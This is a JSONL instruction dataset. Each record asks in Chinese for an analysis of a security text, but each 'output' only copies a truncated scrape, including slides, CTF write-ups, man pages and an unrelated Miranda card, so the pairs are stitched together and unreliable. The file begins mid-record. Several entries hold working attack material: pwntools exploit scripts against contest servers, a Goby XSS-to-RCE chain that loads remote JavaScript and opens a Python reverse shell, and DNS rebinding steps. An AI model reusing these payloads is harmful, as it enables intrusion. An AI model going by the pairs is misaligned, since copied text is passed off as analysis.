Runtime Services Boot Manager (Select Boot Device) EFI Shell/Apps; OS Boot Loader(s) ExitBootServices. Minimal UEFI services (Variable) ACPI, UEFI SystemTable, SMBIOS table CPU Reset Signed BIOS Update & OS Secure Boot Hardware I/O Memory Network Graphics UEFI DXE Core / Dispatcher UEFI OS Loaders (winload.efi, winresume.efi) System Firmware (SEC/PEI) UEFI OROM UEFI Boot Loader Bootx64.efi Bootmgfw.efi Signed BIOS Update UEFI OROM UEFI App UEFI App DXE Driver DXE Driver OS Kernel / Early Launch Anti-Malware (ELAM) UEFI Secure Boot OS Driver OS Driver Windows 8 Secure Boot Attacks Against Both Of These.. BIOS Attack Surface: SPI Flash Protection System FW/BIOS SPI Flash Protection BIOS Update SMRAM Protection Hardware Config. SMI Handlers Secure Boot BIOS Settings (NVRAM, Variables)  SPI Flash Write Protection  Often still not properly enabled on many systems  SMM based write protection of entire BIOS region is o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAgenda  Who we are  What this talk is about  Why?  Background  Timing as a Channel  Timing as a Vector  Privacy Implications - XSRT?  Another acronym - (D)XSRT!  Conclusion / Questions Who we are..  SensePost  Formed in 2000  Written a few papers..  Spoken at a few conferences  Written a few books  Done some Training  marco  haroon http://www.sensepost.com/blog What is this talk about?  Timing Stuff..  Who should care ?  If you are a developer..  Awareness of your applications leakage  If you are a Pen-Tester..  You could be missing attack vectors completely (or stopping short of full ownage when its relatively trivial!)  If you like new acronyms!  X.S.R.T  (D)X.S.R.T Stepping Back a Little An illustrious history of side channel attacks on computing systems  differential power analysis hardware  EM radiation emission analysis hardware  timing analysis software/hardware Traditional Timing  Timing has received lots of attention over the years in the area of crypt- analysis  Kocher [1996]  1st local results against RSA and DH  Brumley & Boneh [2003]  Derived partial RSA over network due to weaknesses in OpenSSL  Bernstein [2004]  Derived full AES key across custom network clients  Percival [2005]  L1 cache access times could be used on HT processors to derive RSA key bits Web Time  Felten & Schneider [2000]  early results on timing and the web  focused on privacy  browser cache snooping  dns cache snooping Web Time Point Oh  Grossman & Niedzialkowski [2006]  SPI Dynamics [2006] Both released a JavaScript port scanner using JSs onerror feature. Implicitly uses timing attacks (connection timed out, hence it is closed)  Bortz, Boneh & Nandy [2007] Direct timing (valid usernames, hidden gallery sizes) Cross Site Timing  <img onerror=xxxxx> A Communication Channel  A solid channel is a real basic requirement.  A quick progression of remote command execution attacks: (relevant to channels) The App. Is the Channel  Sometimes the application by its nature gives data back to th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRevolutionizing the Field of Grey-box Attack Surface Testing with Evolutionary Fuzzing Jared D. DeMott Computer Science Michigan State University demottja@msu.edu Richard J. Enbody Computer Science Michigan State University enbody@msu.edu William F. Punch GARAGe Michigan State University punch@msu.edu Accepted for publication at Black Hat and DEFCON 2007 Abstract Runtime code coverage analysis is feasible and useful when application source code is not available. An evolutionary test tool receiving such statistics can use that information as fitness for pools of sessions to actively learn the interface protocol. We call this activity grey-box fuzzing. We intend to show that, when applicable, grey-box fuzzing is more effective at finding bugs than RFC compliant or capture-replay mutation black-box tools. This research is focused on building a better/new breed of fuzzer. The impact of which is the discovery of difficult to find bugs in real world applications which are accessible (not theoretical). We have successfully combined an evolutionary approach with a debugged target to get real-time grey-box code coverage (CC) fitness data. We build upon existing test tool General Purpose Fuzzer (GPF) [8], and existing reverse engineering and debugging framework PaiMei [10] to accomplish this. We call our new tool the Evolutionary Fuzzing System (EFS), which is the initial realization of my PhD thesis. We have shown that it is possible for our system to learn the targets language (protocol) as target communication sessions become more fit over time. We have also shown that this technique works to find bugs in a real world application. Initial results are promising though further testing is still underway. This paper will explain EFS, describing its unique features, and present preliminary results for one test case. We will also discuss ongoing research efforts. First we begin with some background and related works. Previous Evolutionary Testing Work Evolutionary Testing uses e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nddi/server/login.php - 0x00 0x01 CLI    conf t //config webmaster level 0 username admin password 123123 // show webmaster users //  $res = execCli(\"exec\", \"webmaster $username $password\"); if ($res[\"status\"] != 1) { json_echo($res); exit(); } $isSuccess = trim($res[\"data\"]); if ($isSuccess == 0) { // session_start(); $isSuccess = trim($res[\"data\"]); if ($isSuccess == 0) { //  0x02 username=admin&password=a+b+c+d+e+f ddi/server/fileupload.php  0x03 0x03", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Fibonacci (ppc 400) ###ENG [PL](#pl-version) The task is pretty simple. The server asks us how many recursions we need to compute N-th fibonacci number (using recursive algorithm). For some reason we could spend 25s on each question, which was a bit silly considering we could just pre-compute the results instantly in a fraction of a second. We can compute this using a dynamic algorithm. First two fibonacci numbers require 0 recursions, and k-th number require as many recursions as calculating k-2-th number + 1 (1 because we are calling fib(k-2)), plus calculating k-1-th number plus 1 (again 1 because we are calling fib(k-1)). And we can compute this iteratively from the bottom. So in general: ```python calls = [0, 0] + [0] * (n + 1) for i in range(2, n + 1): calls[i] = calls[i - 1] + calls[i - 2] + 2 ``` We started by pre-computing results for the first 1000 numbers, but this as already an overkill because the largest tests were less than 500. Running this on 100 tests gives the flag: `3DS{g00d4lgorithmsC4nSaveYourTime}` ###PL version Zadanie było dość proste. Serwer pytał ile wywołań rekurencyjnych potrzeba zeby policzyć N-tą liczbę fibonacciego (używając algorytmu rekurencyjnego). Z jakiegoś powodu mogliśmy użyć aż 25s na jedno pytanie, co było dość dziwne biorąc pod uwagę że można było wyliczyć sobie wcześniej tablicę rozwiązań w ułamku sekundy. Możemy policzyć rozwiązanie algorytmem dynamicznym. Pierwsze dwie liczby wymagają 0 rekurencji a k-ta liczba wymaga tyle rekurencji ile policzenie liczby k-2 plus 1 (1 bo wywołujemy fib(k-2)), plus ile policzenie liczby k-1 plus 1 (znowu 1 bo wywyłujemy fib(k-1)). Czyli generalnie: ```python calls = [0, 0] + [0] * (n + 1) for i in range(2, n + 1): calls[i] = calls[i - 1] + calls[i - 2] + 2 ``` Zaczęliśmy przez wyliczenie rozwiazań dla pierwszego 1000 liczb bo okazało się przeszacowaniem, ponieważ największy test miał nie więcej niż 500. Uruchomienie tego dla 100 testów dało nam flagę: `3DS{g00d4lgorithmsC4nSaveYourTime}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH PSFSTRIPTABLE 1 \"28 Oct 1997\" \"控制台工具\" \"Linux 用户手册\" .SH NAME psfstriptable \\- 从控制台字体中移走嵌入的Uniocde字符表 .SH 总览 .B psfstriptable .I 字体文件 [输出文件] .SH 描述 .B psfstriptable 命令从 .IR 字体文件 或者标准输入(此时的 .I 字体文件 是单个破折号(\\-))读取一个可能含有嵌入Unicode字体表的.psf格 式的控制台字体, 并将没有Unicode嵌入字符表的.psf格式的控制 台字体文件写回到标准输出或所指明的输出文件. .SH \"另见\" .BR consolechars (8), .BR psfaddtable (1), .BR psfgettable (1).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n第五空间 WriteUp By Nu1L 第五空间 WriteUp By Nu1L PWN bountyhunter CrazyVM notegame pb Crypto ecc signin doublesage Blockchain CallBox Web EasyCleanup pklovecloud PNG图转换器 yet_another_mysql_injection WebFTP 个信息保护 data_protection Mobile uniapp Misc 签到题 云安全 Cloud_QM PWN bountyhunter from pwn import * s = remote(\"139.9.123.168\",32548) #s = process(\"./pwn\") sh = 0x403408 pop_rdi = 0x000000000040120b payload = b'A'*0x98+p64(pop_rdi)+p64(sh)+p64(pop_rdi+1)+p64(0x401030) # open(\"./payload\",\"wb\").write(payload) s.sendline(payload) s.interactive() CrazyVM from pwn import * def movReg(typea,typeb,reg1,reg2): opcode = b'\\x01' opcode += p8(typea)+p8(typeb)+p8(reg1)+p8(reg2) return opcode.ljust(8,b'\\x00') def movi(typeb,reg1,val): opcode = b'\\x01' opcode += p8(1)+p8(typeb)+p8(reg1)+p32(val) return opcode.ljust(8,b'\\x00') def push(reg): opcode = b'\\x12' opcode += b'\\x04\\x03' opcode += p8(reg) return opcode.ljust(8,b'\\x00') def pop(reg): opcode = b'\\x13' opcode += b'\\x04\\x03' opcode += p8(reg) return opcode.ljust(8,b'\\x00') def addReg(typea,typeb,reg1,reg2): opcode = b'\\x02' opcode += p8(typea)+p8(typeb)+p8(reg1)+p8(reg2) return opcode.ljust(8,b'\\x00') def subReg(typea,typeb,reg1,reg2): opcode = b'\\x03' opcode += p8(typea)+p8(typeb)+p8(reg1)+p8(reg2) return opcode.ljust(8,b'\\x00') def bye(): return b'\\x00\\x05\\x03'.ljust(8,b'\\x00') opcode = b'' # s = process(\"./CrazyVM\") s = remote(\"114.115.221.217\",\"49153\") libc = ELF(\"./libc-2.31.so\") pop_rdi = 0x0000000000026b72 sh = 0x001b75aa system = libc.sym['system'] opcode += movReg(0,3,0,0x10) #reg0 libc offset notegame opcode += movi(2,0x11,0x100ff0-0x80000) opcode += addReg(0,3,0,0x11) opcode += movReg(0,3,0x10,0) opcode += movi(2,0x11,0x1ef2e0) opcode += addReg(0,3,0x10,0x11) opcode += pop(1) #reg1 environ opcode += movReg(0,3,0x10,0) opcode += movi(2,0x11,0x1ec5a0) opcode += addReg(0,3,0x10,0x11) opcode += pop(2) opcode += movi(2,0x11,0x1ec5c0) opcode += subReg(0,3,2,0x11) #reg2 libc opcode += movReg(0,3,3,1) opcode += subReg(0,3,3,2) opcode +", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAaron Bayles DC101 @ DEF CON 22 19 years in IT/Infosec Worked in Oil & Gas (O&G) last 8 years Along the way Penetration testing Vulnerability assessment Network architecture, design & implementation Risk assessment Legacy equipment/comms Remote (geographic) connectivity Availability, not confidentiality or integrity is key (control) Power/space is a premium Life safety can be dependent The demands placed on Industrial Control Systems (ICS) & SCADA networks dont match up with security requirements Understand your network & data flows Does not require expert knowledge Start with the basics Some concepts for enterprise IT can be used, with modification Build relationships between enterprise IT and industrial IT Network segmentation Portable media control Configuration management Patch management Disaster recovery (DR) planning Workforce development/training Although these may be similar, significant differences exist Formally the Purdue Enterprise Reference Architecture (PERA) Widely accepted within ICS industry Compatible with multiple standards, ISA95, ISA99, and IEC 62443 Works with zone & conduit concepts Represented by Layers 0/1-5 Starting point for ICS network segregation Traffic within same zone is allowed Traffic passing between zones via conduits are controlled Layer 2 (L2) can SET/CHANGE values on L1 L3 can only READ values from L2 & L1 Control points also allow for reporting ICS applications often misbehave OPC (Object Linking and Embedding for Process Control) uses MS DCOM They dont always communicate statefully Protocols have been subverted MODBUS DNP3 Some vendors have started to adapt to ICS Tofino (C1D2, DIN rail mount) Palo Alto (Rack mount only for now) Do not install in blocking mode without extensive testing & tuning #1 thing that worries field personnel Due to software issues, vendors MUST approve OS/app patches Cannot patch monthly Time for testing environment USB & removable media control Anti-virus/anti-malware Application whitelisting Patch ma", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Detecting Breakpoints概述 gdb通过替换目标地址的字节为`0xcc`来实现断点, 这里给出一个简单的检测`int 3`断点的示例: ``` c void foo() { printf(\"Hello\\n\"); } int main() { if ((*(volatile unsigned *)((unsigned)foo) & 0xff) == 0xcc) { printf(\"BREAKPOINT\\n\"); exit(1); } foo(); } ``` 正常运行程序会输出Hello, 但是如果之前有在`foo`函数这里设置`cc`断点并运行, gdb则无法断下, 并会输出`BREAKPOINT`. ``` # gdb ./x gdb> bp foo Breakpoint 1 at 0x804838c gdb> run BREAKPOINT Program exited with code 01. ``` 这个要绕过也很简单, 那就是需要阅读汇编代码并注意设置断点不要在`foo`函数入口处. 实际情况就要看检测断点的位置是哪里. 这种监视断点的反调试技术, 关键不在于如何绕过它, 而是在于如何检测它. 在这个示例中可以很轻松的发现, 程序也有打印出相应的信息. 在实际情况中, 程序不会输出任何信息, 断点也无法轻易地断下. 我们可以使用`perl`脚本过滤反汇编代码中有关`0xcc`的代码出来进行检查. 我们可以使用perl脚本过滤反汇编代码中有关0xcc的代码出来进行检查 ``` perl #!/usr/bin/perl while(<>) { if($_ =~ m/([0-9a-f][4]:\\s*[0-9a-f \\t]*.*0xcc)/ ){ print; } } ``` 显示结果 ``` # objdump -M intel -d xxx | ./antibp.pl 80483be: 3d cc 00 00 00 cmp eax,0xcc ``` 检测到后, 既可以将0xcc修改成0x00或0x90, 也可以做任何你想做的操作. 改变0xcc也同样可能带来问题, 就如上篇介绍一样, 程序如果有进行文件校验, 那么我们的改变是会被检测到的. 可能的情况下, 程序也不只是对函数入口点进行检测, 也会在一个循环里对整个函数进行检测. 因此你也可以用十六进制编辑器手动放置一个`ICEBP(0xF1)`字节到需要断下的位置(而非`int 3`). 因为`ICEBP`也一样能让gdb断下来. > Reference: [Beginners Guide to Basic Linux Anti Anti Debugging Techniques](http://www.stonedcoder.org/~kd/lib/14-61-1-PB.pdf)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ Clark County Detention Center 330 S. Casino Center Blvd (702-671-3900) Las Vegas City Jail 3200 Stewart Ave (702-229-6099) Emergency Contact #: _____________ Bail Bond Contact #: ______________ MIRANDA WARNINGS You have the right to remain silent. Anything you say can and will be used against you in a court of law. You have the right to an attorney. If you cannot afford an attorney, one will be appointed to you. If you are a juvenile, you have the right to request your parents be present for any questioning. MIRANDA WARNINGS You have the right to remain silent. Anything you say can and will be used against you in a court of law. You h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DNS Rebinding > DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to make arbitrary requests to the target application and read their responses. ## Summary * [Tools](#tools) * [Exploitation](#exploitation) * [Protection Bypasses](#protection-bypasses) * [References](#references) ## Tools - [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks. - [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack) ## Exploitation First, we need to make sure that the targeted service is vulnerable to DNS rebinding. It can be done with a simple curl request: ```bash curl --header 'Host: <arbitrary-hostname>' http://<vulnerable-service>:8080 ``` If the server returns the expected result (e.g. the regular web page) then the service is vulnerable. If the server returns an error message (e.g. 404 or similar), the server has most likely protections implemented which prevent DNS rebinding attacks. Then, if the service is vulnerable, we can abuse DNS rebinding by following these steps: 1. Register a domain. 2. [Setup Singularity of Origin](https://github.com/nccgroup/singularity/wiki/Setup-and-Installation). 3. Edit the [autoattack HTML page](https://github.com/nccgroup/singularity/blob/master/html/autoattack.html) for your needs. 4. Browse to \"http://rebinder.your.domain:8080/autoattack.html\". 5. Wait for the attack to finish (it can take few seconds/minutes). ## Protection Bypasses > Most DNS protections are implemented in the form of blocking DNS responses containing unwanted IP addresses at the perimeter, when DNS responses enter the internal network. The most common form of protection is to block private IP addresses as defined in RFC 1918 (i.e. 10.0.0.0/8, 172.16.0.0/12, 192.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGOBY 0x00 awvsgoby 0x01 windowsgobymac /Applications/Goby.app app electronapp.asarjs asar e app.asar builddist jsbuilddist exec execSync scan.js render.js 90000js 0x02 xsshttp goby xss ip phpphpvendor headerh1phphttpserver XSSscriptimg <img src=\"x\" onerror=\"alert(1);\"> tab XSS jbXSS ip 8080 xss 0x03 XSSRCE XSSelectronXSSRCEhttps://www.uedbox.com/post/54188/ require('child_process').exec('xxxxxxx'); rce N 1. tabjs 2. 3. 4. '-' ${IFS} //IFS {'ls','-a'} // exec execjs execFile js 1. goby 2. phpheaderxssjs 3. js 4. jbxssrce phpindex.php <?php header(\"X-Powered-By: PHP/<img src=\\\"x\\\" onerror=import(unescape('http%3A//127.0.0.1/test2.js'))>\"); ?> %3ACamarotest2.js (function(){ require('child_process').exec('open /System/Applications/Calculator.app'); require('child_process').exec('python -c \\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST REAM);s.connect((\"127.0.0.1\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess .call([\"/bin/sh\",\"-i\"]);\\''); })(); pyshell99999999ncjsgoby chromejs php sudo php -S 127.0.0.1:80 -F index.php goby->IP->XSS->RCE 0x04 gobyXSSshell js RCEXSSRCE jsexecXSSXSS XSSRCE 1clickr1 0x05 goby gobygoby web goby urlurl url goby30x 302127.0.0.1 http://127.0.0.1:8361/api/v1/deleteTask.html?id=20210812180320 OK api RCE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nObjective We have to defeat the enemies and save the earth!! Our contributions  Introduce a new concept of analysis framework to use easily o perform analysis of normal application by using web proxy  Introduce methodologies for implementing our concept o pros and cons of the methodologies  Demonstrate use cases Define Keyword  Web Application o consist of usually script languages o operate based on web server/client  Normal Application o executable binary except for web applicaton o PE, ELF, etc.  Web Proxy o a tool for web application analysis o Burp suite, paros, fiddler, etc. Whats wrong? Background Existing methodologies/tools for application analysis Web Application analysis  easy to use and operate using a web proxy (burp, paros, fiddler, etc.)  monitor and modify the contents without difficulty Existing methodologies/tools (contd) Normal Application(excutables) analysis  much harder and complex than web application(GDB, IDA, Ollydbg, windbg, etc.)  In secure channel, how can we check the contents? Challenges for application analysis We cannot save the earth using our resources Lack of time and manpower How to solve a problem? Need a EASY tool So what?? BinProxy : A New Paradigm for Binary Analysis Lets get started with Demo! Key Features We do not need gdb and ollydbg to analyze applications any more. Key Features (contd) 2. modify return value 1. original return value 3. Click Forward Button Should we use the difficult tools for simple analysis? You can monitor and control the normal applications with your favorite web proxy Key Features (contd) We do not want to use difficult IDA tool to analyze applications any more. Key Features (contd) You can know what functions are existed in target apps and what functions can be monitored. Overall Achitecture Components  Target application o smart phone apps, excutable program based on Windows, OSX and etc.  Web Proxy o A user-friendly proxy to be used for analysis (ex. burp, paros, ..)  BinProxy Client o is Operated", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDigital Vengeance Exploiting the Most Notorious C&C Toolkits @professor__plum Disclaimer The views expressed herein do not necessarily state or reflect the views of my current or former employers. I am not responsible for any use or misuse of the information provided. Implementation of the information given is at your own risk. The malware that was used would have slipped or probably got past 90% of internet defenses that are out there today in private industry Joseph Demarest, assistant director of the FBIs cyber division The sophisticated attack hackers obtained data on tens of millions of current and former customers and employees in a sophisticated attack Anthem  identified an extremely sophisticated cyber attack RSA \"It is simply not possible to beat these hackers James A. Lewis Cybersecurity Expert at Center for Strategic and International Studies (CSIS) Government and non-government entities are under constant attack by evolving and advanced persistent threats and criminal actors. These adversaries are sophisticated, well-funded, and focused. Office of Personnel Management \"The threat is very persistent, adaptive and sophisticated  and it is here to stay, SWIFT Hacking back 36% of BH 2012 attendees surveyed said they engaged in some form of hacking back Many feel justified in hacking back because their government isnt doing enough to protect them The ACDC would exempt victims from hacking laws when the aim is to identify the assailant, cut off attacks or discover stolen files. Most likely Illegal Little to no gain Much at risk Liability Reputation Productivity Escalation Hacking back Active Cyber Defense Certainty Act RAT terminology  Client  Victim  Target  C2 Server  Attacker  Victim  Adversary  Retaliator - one who returns assault in kind *icons credit Open Security Architecture Sophisticated attack hit list  Buffer overflow exploit by Andrzej Dereszowski  Follow on work by Jos Wetzels APT1 & Poison Ivy Remote file download exploit by Shawn Denbow and Jesse Hertz ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeaponizing Lady GaGa PsychoSonic Attacks Brad (theNURSE) Smith Private Practice Informatics Nurse What the heck is PsychoSonics?  Sounds that effect the Brain  Harmonize with brain  Not NLP, Yes SE Heinrich Wilhelm Dove  Binary beats founder  One for the first Climatologist  Binaural, Monaural, and Isochronic Physiology of PS Music 'nurtures' premature Babies  A Canadian team found music reduced pain and encouraged better oral feeding. http://news.bbc.co.uk/2/hi/health/8068749.stm Frequency Wave Produces 40Hz > Gamma Insight, Ah Ha moment 13 to 40 Hz Beta Active, busy or anxious thinking and active concentration 8 to 13 Hz Alpha Relaxation (while awake) 4 to 7 Hz Theta Dreams, deep meditation, hypnosis < 4 Hz Delta Deep dreamless sleep Military Uses Hx of PS Japanese Sonic Tuba Vietnam War C47 with Loudspeakers   LRAD can put the word of God into their heads. If God, in the form of a voice that only you can hear, tells you to surrender, or run away, what are you gonna do? Ghosts   the showing was 18.98 hertz--the exact frequency at which a human eyeball starts resonating.  www.physicsroom.com.nz The Urban Funk Campaign Wandering Soul recordings of eerie sounds said to represent the souls of the dead were played at night to spook the superstitious enemy. Problems  Gitmo: played Neil Diamond Coming to America  Binyam Mohamed forced to listen to Eminem and Dr Drs for 20 days Top 10 Sonic torture songs 1. White America  Eminem. 2. Barney theme song. 3. Enter Sandman  Mettalica. 4. Hells Bells  AC/DC. 5. Stayin Alive  Bee Gees. 6. Dirrty  Christina Aguilera. 7. America  Neil Diamond. 8. Bulls on Parade  Rage Against the Machine. 9. American Pie  Don McLean. 10. Bodies  Drowning pool Mosquito speaker  Either set the device to 17KHz to disperse groups of troublesome teenagers OR set it to 8 KHz to disperse people of any age Does Vegas do PS?  How many think Vegas uses psychosonics on the casino floor?  The sound of slot machines? Creating weapons of Mass GaGa Her Arsenal ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKCon KCon 智能门锁的天灾人祸 Bluetooth smart locks安全攻防研究 关于作者  启明星辰ADlab安全研究员  研究方向智能设备安全研究与漏洞挖掘  邮箱butterflyhuangxx@gmail.com  看雪IDID蝴蝶 PART 01 浅谈蓝牙低能耗 PART 02 智能门锁的安全问题 PART 03 研究案例分享 PART 04 改进方案 PART 05 写在最后 目录 CONTENTS 01 浅谈蓝牙低能耗 蓝牙低能耗应用场景 蓝牙低能耗特点  低能耗可变连接时间  传输距离远  采用128bitAES加密  低延时 蓝牙低能耗协议栈  蓝牙应用层  Host层  Controller层 物理层Physical Layer  频段2.4GHz无需授权  射频信道40个3738 39为广播信道其他为数据信道  跳频特性 链路控制层Link Layer  五种状态Standby,Advertising, ScanningInitiating,Connection  状态机 通用属性协议GATT  GATT定义了客户端和服务端  客户端发送请求到GATT服务端  包含多个ServiceService包 含多个Include和Characteristic  服务端接收客户端发来的请求 和指令并存储Characteristic的value 心率计服务  服务是一些列由数据和相关行为组成的集合 为了去完成某个特定的功能和特性  Service和Charachteristic的UUID是公共的 也可自定义  Properties  Descriptors  Value 安全管理SM  JustWorks 临时密钥tk默认6个0  6-digit PIN/Passkey Entry临时密钥tk随机6位数 000000-999999适合有屏幕输入的  Out of band带外是使用另一个无线方式将数据传给蓝牙设备 这种方式下tk值为128bits 02 智能锁的安全问题 蓝牙协议本身潜在攻击面  配对时的密钥分配不安全  GATT的Profile中的数据交互接口暴露  总归还是协议出了问题那就从协议分析入手 蓝牙智能锁的攻击面  APP存在的攻击面  APP被逆向分析  APP打印日志泄露关键信息  APP和服务器交互的WEB安全问题  APP和锁之间的认证问题  蓝牙协议攻击面  通信协议分析  工具Ubertooth One/usb Dongle  /直接分btsnoop_hci.log  锁中的固件问题 趋势比较 研究案例分享 03 案例分析一  一款BLE和GPS合一的共享车锁 APP操作端  先扫描设备  扫描到设备后进行配对  配对成功即可操作 分析蓝牙数据 蓝牙锁响应后返回的数据 看看APP日志 逆向分析APP 加密方式协议包 获取token开锁 01 23 获取token数据包16byte GET_TOKEN 固定值 随机数 415 开锁数据包16byte 01 2 OPEN_TYPE 固定值 密码 912 38 token 1315 随机数 攻击方式 发送获取token指令 伪造APP 没有做 到mac 认证 返回token 发送OPEN指令 案例分析二 使用http明文传输请求包可以重放 明文密钥弱口令 获取token的指令  上一次的token会参与本次获取 token的运算如何获取上一次 token  从app第一次运行入手 案例分析三 工作模式 移动端APP 通过key 开锁无 数据包加 密 智能锁 远程服 务器 用户注册并下 放key 返回结果 存在的安全隐患 移动端APP app直接发送key进行 开锁并无特定开锁 指令包 智能锁 远程服 务器 获取key的请求 包可以重放 Attack 请求包重放 开锁逻辑 开锁指令蓝牙数据包 蓝牙数据包一次性只能发送20byte超过的必须要分片发送 改进方案 04 攻击不是目的如何改进  至少要APP加固  APP端的密钥不使用硬编码弱口令  配对密钥管理与分配  锁和APP的验证问题MAC白名单  智能设备的固件更新问题  协议通信能不能使用非对称加密 通过协议进行设备和移动端互认证 1en(A1,B1),key 2en(A2,B2),key 3en(A3,B3),A1B1A2B2 4en(A3,B3),A1B1A2B2 写在最后 05 物联容易安全不易且行且珍惜 嵌入式系统 bin web 后台管理 交互接口 固 件 通信协议 云端 攻击面很多  Web弱口令SQL注入跨站权限绕过...  Bin缓冲区溢出...  APP代码逆向Log敏感信息泄露WebView远程代码执行拒 绝服务攻击database配置错误...  协议方面  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 50. 第一个只出现一次的字符位置 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/1c82e8cf713b4bbeb2a5b31cf5b0417c?tpId=13&tqId=11187&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 在一个字符串中找到第一个只出现一次的字符并返回它的位置字符串只包含 ASCII 码字符 ``` Input: abacc Output: b ``` ## 解题思路 最直观的解法是使用 HashMap 对出现次数进行统计字符做为 key出现次数作为 value遍历字符串每次都将 key 对应的 value 加 1最后再遍历这个 HashMap 就可以找出出现次数为 1 的字符 考虑到要统计的字符范围有限也可以使用整型数组代替 HashMapASCII 码只有 128 个字符因此可以使用长度为 128 的整型数组来存储每个字符出现的次数 ```java public int FirstNotRepeatingChar(String str) { int[] cnts = new int[128]; for (int i = 0; i < str.length(); i++) cnts[str.charAt(i)]++; for (int i = 0; i < str.length(); i++) if (cnts[str.charAt(i)] == 1) return i; return -1; } ``` 以上实现的空间复杂度还不是最优的考虑到只需要找到只出现一次的字符那么需要统计的次数信息只有 0,1,更大使用两个比特位就能存储这些信息 ```java public int FirstNotRepeatingChar2(String str) { BitSet bs1 = new BitSet(128); BitSet bs2 = new BitSet(128); for (char c : str.toCharArray()) { if (!bs1.get(c) && !bs2.get(c)) bs1.set(c); // 0 0 -> 0 1 else if (bs1.get(c) && !bs2.get(c)) bs2.set(c); // 0 1 -> 1 1 } for (int i = 0; i < str.length(); i++) { char c = str.charAt(i); if (bs1.get(c) && !bs2.get(c)) // 0 1 return i; } return -1; } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH MKNOD 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 mknod \\- 创建块或者字符特殊文件 .SH 概述 \\fBmknod\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,名称 类型 \\/\\fP[\\fI\\,主设备号 从设备号\\/\\fP] .SH 描述 .\\\" Add any additional description here .PP 使用指定文件名称和给定类型创建特殊文件 .PP 必选参数对长短选项同时适用 .TP \\fB\\-m\\fP, \\fB\\-\\-mode\\fP=\\fI\\,模式\\/\\fP 将文件权限位设置为给定的模式类似 chmod而不是类似 a=rw 这样 .TP \\fB\\-Z\\fP 将 SELinux 安全上下文设置为默认类型 .TP \\fB\\-\\-context\\fP[=\\fI\\,CTX\\/\\fP] 类似 \\fB\\-Z\\fP或者如果指定了上下文则将 SELinux 或者 SMACK 安全上下文设置为指定类型 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 当类型为 bc 或者 u 时必须同时指定主设备号和从设备号当类型为 p 时它们必须同时被省略如果主设备号和从设备号以 0x 或者 0X 